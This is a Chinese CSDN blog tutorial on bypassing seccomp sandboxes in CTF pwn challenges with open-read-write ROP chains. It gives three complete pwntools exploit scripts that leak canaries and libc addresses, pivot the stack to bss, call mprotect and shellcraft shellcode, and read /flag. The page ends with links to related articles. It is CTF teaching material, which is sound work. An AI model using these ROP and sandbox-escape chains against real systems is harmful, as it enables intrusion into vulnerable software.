pwn中沙盒保护之orw绕过

最新推荐文章于 2024-11-19 19:50:14 发布
最新推荐文章于 2024-11-19 19:50:14 发布
阅读量1.9k 收藏 21
点赞数 18
文章标签: python linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wangxunyu6/article/details/136566997
版权
本文介绍了如何在具有沙盒保护的环境中利用orw(openreadwrite)技术绕过限制,通过示例展示了如何通过获取canary值、libc_base和栈地址进行漏洞利用,以及如何执行栈迁移和flag的ORW操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1:什么是沙盒保护

简单来说开启沙盒保护后execve被禁用,也就是说即使我们拿到shell也没有用。我们可以使用

seccomp-tools dump指令进行查看。

2:使用orw绕过的意义

orw全称open read write.指将根目录下的flag的文件打开,然后read进行读取,最后写出来。由于system函数被禁用,只能通过这种方式拿到flag.

3:例题

前置知识open函数的参数,open(name[, mode[, buffering]])

  • name : 一个包含了你要访问的文件名称的字符串值。

  • mode : mode 决定了打开文件的模式:只读,写入,追加等。所有可取值见如下的完全列表。这个参数是非强制的,默认文件访问模式为只读(r)。

  • buffering : 如果 buffering 的值被设为 0,就不会有寄存。如果 buffering 的值取 1,访问文件时会寄存行。如果将 buffering 的值设为大于 1 的整数,表明了这就是的寄存区的缓冲大小。如果取负值,寄存区的缓冲大小则为系统默认。

所以简单来说open(flag,0)这样就是符合我们要求需要构造的open函数

##例题1:

来自于polar中的pwn困难的“格式化”存在后门函数,但是可以通过orw进行操作

 开启了canary保护

思路:第一次gets读入先泄露canary的值,第二次gets读入泄露libc_base,顺便返回到main函数

然后第三次读入泄露一个栈地址。最后orw。

from pwn import *
#p=remote("120.46.59.242",2141)
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
context(os='linux', arch='amd64', log_level='debug')
p = process("./fm")
def bug():
	gdb.attach(p)
	pause() 
elf=ELF('./fm')  
rdi=0x400883
bss=0x601060
ret = 0x4005a1
main = 0x400726
payload=b'%31$p'
#bug()
p.sendline(payload)

p.recvuntil("0x")
canary=int(p.recv(16),16)
print(hex(canary))

pay=b'%7$saaaa'+p64(elf.got['printf'])+p64(canary)*25+p64(ret)+p64(main)

p.sendline(pay)
libc_base=u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-libc.sym['printf']
print('libcbase:'+ hex(libc_base))
mprotect=libc_base+libc.symbols['mprotect']
open_addr = libc_base + libc.sym['open']
read_addr = libc_base + libc.sym['read']
write_addr = libc_base + libc.sym['write']
rsi = 0x2601f + libc_base
rdx = 0x119431 + libc_base

pay = b'%4$p'
p.sendline(pay)
p.recvuntil("0x")
stack=int(p.recv(12),16)
print(hex(stack))
pause()

payload = b"/flag\x00\x00\x00"+p64(canary)*26
payload += p64(rdi)
payload += p64(stack)
payload += p64(rsi)
payload += p64(0)
payload += p64(open_addr)
payload += p64(rdi)
payload += p64(3)
payload += p64(rsi)
payload += p64(bss+0x100)
payload += p64(rdx)
payload += p64(0x100)*2
payload += p64(read_addr)
payload += p64(rdi)
payload += p64(1)
payload += p64(rsi)
payload += p64(bss+0x100)
payload += p64(rdx)
payload += p64(0x100)*2
payload += p64(write_addr)
#pause()
p.sendline(payload)
p.interactive()

 或者在返回main函数后选择栈迁移到bss段上读取flag.

##例题2:

接收一下puts函数的地址计算出libc然后进行orw,这个题是在bss上操作的

from pwn import *
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
context(os='linux',arch='amd64',log_level='debug')
p = process("./orw")
elf=ELF('./orw')  
def bug():
	gdb.attach(p)
	pause() 
rdi=0x4012c3
bss=0x404040
p.recvuntil("0x")
libc_base=int(p.recv(12),16)-libc.sym['puts']
print(hex(libc_base))
mprotect=libc_base+libc.sym['mprotect']
rdx=libc_base+0x119431
rsi=libc_base+0x2601f
open=libc_base+libc.sym['open']
read=libc_base+libc.sym['read']
write=libc_base+libc.sym['write']
pay1=b'a'*0x20+p64(bss+32)+p64(0x401220)
p.send(pay1)
pay2=b'a'*0x28+p64(rdi)+p64(0x404000)+p64(rsi)+p64(0x1000)+p64(rdx)+p64(7)*2+p64(mprotect)+p64(bss+112)+asm(shellcraft.open("/flag"))+asm(shellcraft.read(3,bss,0x100))+asm(shellcraft.write(1,bss,0x100))
###pay3=b'a'*32+b'/flag\x00\x00\x00'+p64(rdi)+p64(bss+0x20)+p64(rsi)+p64(0)+p64(open)+p64(rdi)+p64(3)+p64(rsi)+p64(bss+0x700)+p64(rdx)+p64(0x100)*2+p64(read)+p64(rdi)+p64(1)+p64(rsi)+p64(bss+0x700)+p64(rdx)+p64(0x100)*2+p64(write)
p.sendline(pay2)
p.interactive()

第一个payload进行栈迁移到bss段上。pay2先进行溢出,构造mprotect函数的三个参数,进行调用。然后返回到bss段上。然后orw。pay3是手动构造orw三个函数先将flag这个东西写到bss上然后就是先构造每个函数的参数,最后orw读出来flag。

##例题3:

溢出字节0x10,和上篇栈迁移文章一样,先迁移到bss段上,然后继续读入到bss段上去泄露libc_base,然后进行orw

from pwn import *
context(log_level='debug',os='linux',arch='amd64')
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
#libc=ELF("./libc.so.6")
p=process("./pwn2")
elf=ELF("./pwn2")
def bug():
	gdb.attach(p)
	pause()
bss=0x404040+0x500
p.recvuntil("lbs,lbs,lbs\n")
pay=b'a'*0x40+p64(bss+0x40)+p64(0x4011C9)
p.send(pay)

rbp=0x40115d
rdi=0x401283
p.recvuntil("lbs,lbs,lbs\n")
pay=(p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(rbp)+p64(bss+0x500+0x40)+p64(0x4011C9)).ljust(0x40,b'\x00')+p64(bss-8)+p64(0x00000000004011ec)
#bug()
p.send(pay)

#leek libc_base================================================
puts_addr=u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))
libc_base=puts_addr-libc.sym['puts']
print(hex(libc_base))
#==============================================================

open_addr=libc_base+libc.sym['open']
write_addr=libc_base+libc.sym['write']
read_addr=libc_base+libc.sym['read']

mprotect=libc_base+libc.sym['mprotect']
rsi=libc_base+0x000000000002be51
rdx_r12=libc_base+0x000000000011f497
pay=p64(rdi)+p64(0)+p64(rsi)+p64(0x404a80-8)+p64(rdx_r12)+p64(0x1000)*2+p64(read_addr)+p64(bss+0x500-8)+p64(0x00000000004011ec)
bug()
p.send(pay)

payload  =b'/flag\x00\x00\x00'
payload +=p64(rdi)
payload +=p64(0x404a80-8)
payload +=p64(rsi)
payload +=p64(0)
payload +=p64(open_addr)

payload +=p64(rdi)
payload +=p64(3)
payload +=p64(rsi)
payload +=p64(bss+0x600)
payload +=p64(rdx_r12)
payload +=p64(0x100)*2
payload +=p64(read_addr)

payload +=p64(rdi)
payload +=p64(1)
payload +=p64(rsi)
payload +=p64(bss+0x600)
payload +=p64(rdx_r12)
payload +=p64(0x100)*2
payload +=p64(write_addr)
p.send(payload)


p.interactive()

可以去看下上一篇的栈迁移有详细解答。栈迁移完就是正常的orw。

wangxunyu6
关注
PWN题[强网先锋]orw超详细讲解(多解法)
am_03的博客
09-01 4868
知识点 构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖正常的返回地址。 \x00 截断符 shellcode里出现\x00就会从其截断,所以构造shellcode的时候要避免\x00 x64函数调用规则 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存
[CTF]PWN--沙中的栈迁移构造read利用
2301_79880752的博客
02-26 1306
我们需要在调试中寻找read函数的返回地址,将其作为读入的位置,因为我们后面要在这个构造的read函数中读入orw,我们将orw写入到read函数返回地址上,这样读入之后就可以直接执行orw获取权限,为了使程序运行成功我们可以先随便写一个bss地址作为读入位置。还记得我们一开始将读入位置迁到bss段上了吗,连接远程时程序运行时的生成栈地址可能会改变,但是,内存(bss)是不会变的,因此本题我们可以直接通过调试得到返回地址,而这个返回地址必然是bss段地址,也就是说在连接远程的时候是不会改变的。
pwnorw
weixin_43960998的博客
06-19 1949
本文分为两部分,一部分是2.27及一下的 setcontext + orw,一部分是 2.29 及以上的 setcontext + orw。 利用条件 2.27: 开了沙箱 uaf 等控制 free_hook 一、2.27 libc 2.27及以下的 setcontext: 给各寄存器传参分别由 rdi 来完成,一般的套路是线泄漏 libc 和 heap_base,我们把某一个 chunk 填充为: frame = SigreturnFrame() frame.rsp = libc.sym['__fr
pwn——沙箱机制
djhtdjdywgjc的博客
11-20 2354
pwn沙箱
PWN-Sandbox 介绍
最新发布
m0_57836225的博客
11-19 880
利用内核漏洞如果操作系统内核存在漏洞,攻击者可能利用这些漏洞突破 Sandbox 的限制。例如,在某些情况下,内核中的权限检查代码可能存在逻辑错误,攻击者可以通过精心构造的输入触发该漏洞,从而提升在 Sandbox 中的权限,使其能够访问更多系统资源或者执行被禁止的操作。资源耗尽攻击针对 Sandbox 对资源的限制,攻击者可能尝试进行资源耗尽攻击。
沙箱pwn
s_hiy_iyi的博客
03-24 527
BPF_LD:加载操作,BPF_H表示按照字节传送,BPF_W表示按照双字来传送,BPF_B表示传送单个字节。BPF_LDX:从内存中加载byte/half-word/word/double-word。BPF_ST,BPF_STX:存储操作BPF_ALU,BPT_ALU64:逻辑操作运算。BPT_JMP:跳转操作,可以和JGE,JGT,JEQ,JSET一起表示有条件的跳转,和BPF_JA一起表示没有条件的跳转。
2021 蓝帽杯 pwn slient
weixin_51298357的博客
04-29 1064
2021 蓝帽杯 pwn slient 这道题不是第一个上的pwn题,第一道太难了,第二个一出来就去看第二个题了= = 一个沙箱绕过的题,以前没写过类似的,当场也没有写出来,于是复现一下。 前置知识 seccomp概述 restrict模式:SECCOMP_SET_MODE_STRICT 白名单:read,write,_exit,sigreturn 除了已经打开的文件描述符和允许的系统调用,如果发起其他系统调用,内核会使用SIGKILL或SIGSYS终止进程 filter模式:SECCOMP
关于沙箱关闭execve的绕过技巧及SROP的简单利用方法 --(buuctf[V&N2020 公开赛])babybabypwn + warmup
PLpa的博客
07-05 1723
前言 最近做buuctf又发现一种以前没有见过的沙箱关闭execve的题目,在网上找了很多资料,终于初步了解了一些简单的绕过技巧,故写此博客记录一下。 [V&N2020 公开赛]babybabypwn 查看保护 保护全开的64位Linux程序。 IDA查看伪代码 直接进入main函数看看,发现syscall函数,并不是很了解这个函数,但是通过百度我们知道syscall的几个参数的意义。 第一个参数表示syscall调用的函数,例如题目中的15调用的就是sigreturn。 看到sigreturn
pwn题堆利用的一些姿势 -- setcontext
lifanxin的博客
06-27 3611
setcontext概述setcontext介绍setcontext具体操作setcontext实例总结 pwn题堆利用的一些姿势 – malloc_hook pwn题堆利用的一些姿势 – free_hook pwn题堆利用的一些姿势 – IO_FILE 概述   在做堆题的时候,经常会遇到保护全开的情况,其中对利用者影响最大的是PIE保护和Full RELRO,NX保护和栈保护对堆利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保护的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上
【CTF】【PWNorw
m0_50819561的博客
10-09 1672
这是沙机制,就是限制你能使用的syscall。 seccomp-tools这个工具能快速地查出你能使用地syscall。 我们能使用的常用的构造攻击链的只有open,read,write。 但是因为限制了syscall,所以我们不能用特殊的系统调用getshell。 有两种方法,一种直接写汇编,一种利用shellcraft构造。 下面是汇编: ...
CTF-PWN-沙箱逃脱-【seccomp和prtcl-2】
llovewuzhengzi的博客
01-08 1917
ret的gadget的地址。直到通过该得到的栈地址-231*8可得到数组的起始地址,然后输入open的第一个参数在此位置即./flag,注意此时由于函数此时是整数输入,输入的字节会逆序排放到内存中,而调用open时是字符串参数,会从低地址到高地址一个一个转换,所以此时我们需要逆序输入./flag的字节即按galf/.字节输入。接下来就构造ROP链即可,首先是open(数组的初始地址,0,2) rax=2,此时构造的rdx不会对函数有影响,只是使得第二个参数和rax的值一样得以成功调用系统调用。
pwn学习笔记(8)--初识Pwn沙箱
qq_66013948的博客
08-06 1422
​ 沙箱机制,英文sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。​ 安全计算模式seccomp(Secure Computing Mode)在Linux2.6.10之后引入到kernel的特性,可用其实现一个沙箱环境。使用seccomp模式可以定义系统调用白名单和黑名单。seccomp机制用于限制应用程序可以使用的系统调用,增加系统的安全性。​ 在ctf中主要通过两种方
CTF-PWN-沙箱逃脱-【侧信道爆破】(2021-蓝帽杯初赛-slient)
llovewuzhengzi的博客
02-10 2048
如果比较成功了,那么程序将进入死循环(我们可以通过time这个模块来获取时间戳的差值),比如时间超过2秒那么我们对于flag的一个字节就爆破成功,超过两秒的原因是在未出现异常时设置了持续时间3秒的接收的操作,持续三秒后时间间隔肯定大于2秒,而出现异常的也就是没进入循环的(比较错误的)会出现异常。侧信道攻击是一种非正常的攻击手段,是一种利用计算机不经意间发出的声音来判断计算机的执行情况,比如通过散热器的响声大小来判断计算机所运行程序的复杂性;此为系统的分页大小,不一定会和硬件分页大小相同。
orw总结
weixin_66751120的博客
02-07 1173
一般沙机制开启后,会禁掉execve函数,也就意味着one_gadget以及system函数都不能使用,这就需要去利用open/read/write函数来拿到flag,当程序中出现sanbox或者seccomp时就要注意到开启了沙机制,这就可以利用seccomp-tools工具去查看什么函数被禁掉了,然后通过一道题的两种构造orw的方式来加深理解。
CTF-pwn: orw
weixin_59166557的博客
10-27 732
ORW(Open, Read, Write)是一种常见的利用技术,通常用于在攻破某个系统后读取文件(例如读出 flag 文件)的场景。
CTF-PWN-沙箱逃脱-【seccomp和prtcl-1】
llovewuzhengzi的博客
01-08 1650
code为0x20是BDF_LD(0x00)|BDF_ABS(0X20)|BOF_W的结果,就是将一个字的值通过固定偏移量复制到累加器中,此时k对应为偏移量4,即seccomp_data偏移量为4的位置正好是arch的结构。此时code 15是BPF_JMP(0x05)|BPF_JEQ(0x10)的结果,此时是相等跳转指令,相等则跳转到下一条指令,不相等则跳转到下条指令+0x19的位置,将累加器与k的值做对比,此时累加器的值是之前取的arch。,但每个头文件的这个“标识”都应该是唯一的。
glibc2.27下堆题绕过沙箱
qq_45595732的博客
03-27 794
这里因为重点在于沙箱的绕过,漏洞就拿了一个最简单的uaf做演示。 最主要的是setcontext这个函数,可以看到setcontext+53之后控制了大量的寄存器(可以看作就是一个SigreturnFrame),寻址都是[rdi+x]的方式,那么我们假如劫持了free_hook为setcontext+53,此时rdi刚好是堆块内容的地址,我们可以直接放个SigreturnFrame进去,之后利用的话就按个人喜好了。我写了三种方式,本质都是orw。 1.mprotect+shellcode 2.rop(rop
祥云杯2022 pwn - sandboxheap
z1r0的博客
11-02 513
上了sandbox,需要逆一下,在0x2710这里的功能就是允许mport和orw,所以在上面第一次exp的基础上还要再加上一个。下面的exp是笔者第一次直接打sandboxheap的,可以实现orw,然后第二个exp是打题目的,因为题目上了sandbox。这里笔者没有使用SigreturnFrame,直接看的setcontext + 53的汇编然后自己写了一下布局。其实就是一个2.27下的orw,直接拿板子套,直接参考的这位。在上一个heap基础上加了一个沙箱。的2.27下的orw
[BUUCTF]PWN——pwnable_orw
mcmuyanga的博客
11-10 2191
pwnable_orw 附件 步骤: 例行检查,32位程序,开启了canary 本地运行一下程序,看看大概的情况,提示我们输入shellcode 32位ida载入,检索字符串,没看见什么可以直接利用的,直接看main函数 orw_seccomp函数 prctl在百度后知道了是沙机制,具体的看这篇文章 prctl seccomp相当于内核中的一种安全机制,正常情况下,程序可以使用所有的syscall,但是当劫持程序流程之后通过exeve来呼叫syscall得到shell时seccomp边
深入解析CTF PWN中fastbin堆溢出技术
资源摘要信息:"CTF(Capture The Flag)PWN是信息安全领域中的一个常见挑战类型,主要关注于漏洞利用和安全漏洞挖掘。在这类比赛中,参赛者需要利用各种编程语言和工具对目标系统进行攻击,以获取目标系统的控制权。...
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值